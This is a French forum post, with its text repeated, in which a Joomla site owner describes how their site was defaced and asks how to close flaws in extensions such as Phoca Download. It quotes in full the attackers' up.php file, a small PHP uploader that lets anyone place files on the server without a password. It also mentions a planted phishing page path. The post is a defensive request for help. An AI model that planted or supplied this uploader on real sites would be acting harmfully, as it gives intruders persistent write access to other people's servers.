Bonjour,
Mon site a été hacké hier soir par
Hacked by [...]
(ils ont laissés un fichier x.htm à la racine)
et un fichier up.php:
<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
qui permet d'envoyer des fichiers sur mon site sans qu'aucun mot de passe ne soit demandé
ainsi que pas mal de fichiers du genre:
components/com_gmapfp/images/brain/itunes/itunes/itunes/itunesconnect/877116fae9cf0253df063678930deeed/c/18bed2f63dbb1bede979653f34e2f7da/itc/css/background_gradient_black.html
Je le sais grace à Eyesite.
QuickScan ne me ramène aucune signature dangereuse. Je vais donc repartir d'un backup akeeba et installer de suite aeSecure.
Je suis en version php 5.3.3 et Joomla! 3.2.7. J'ai essayé de chercher des mises à jour des extensions via l'admin de Joomla!, rien trouvé.
Sur leur compte Facebook, ces hackers montrent des failles de jdownload,... et phocadownload que mon site utilise.
J'aurai voulu avoir vos conseils pour empêcher ces pirates de recommencer (mes mots de passe tfp, Joomla! et php sont déjà balaises). Si il y a une faille dans phocodownload, comment je peux la "combler" ? Et comment je peux savoir si il n'y a pas une autre faille dans une autre extension ou module de Joomla! ?
Merci d'avance de vos conseils.
Mon site a été hacké hier soir par
Hacked by [...]
(ils ont laissés un fichier x.htm à la racine)
et un fichier up.php:
<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
qui permet d'envoyer des fichiers sur mon site sans qu'aucun mot de passe ne soit demandé
ainsi que pas mal de fichiers du genre:
components/com_gmapfp/images/brain/itunes/itunes/itunes/itunesconnect/877116fae9cf0253df063678930deeed/c/18bed2f63dbb1bede979653f34e2f7da/itc/css/background_gradient_black.html
Je le sais grace à Eyesite.
QuickScan ne me ramène aucune signature dangereuse. Je vais donc repartir d'un backup akeeba et installer de suite aeSecure.
Je suis en version php 5.3.3 et Joomla! 3.2.7. J'ai essayé de chercher des mises à jour des extensions via l'admin de Joomla!, rien trouvé.
Sur leur compte Facebook, ces hackers montrent des failles de jdownload,... et phocadownload que mon site utilise.
J'aurai voulu avoir vos conseils pour empêcher ces pirates de recommencer (mes mots de passe tfp, Joomla! et php sont déjà balaises). Si il y a une faille dans phocodownload, comment je peux la "combler" ? Et comment je peux savoir si il n'y a pas une autre faille dans une autre extension ou module de Joomla! ?
Merci d'avance de vos conseils.
Commentaire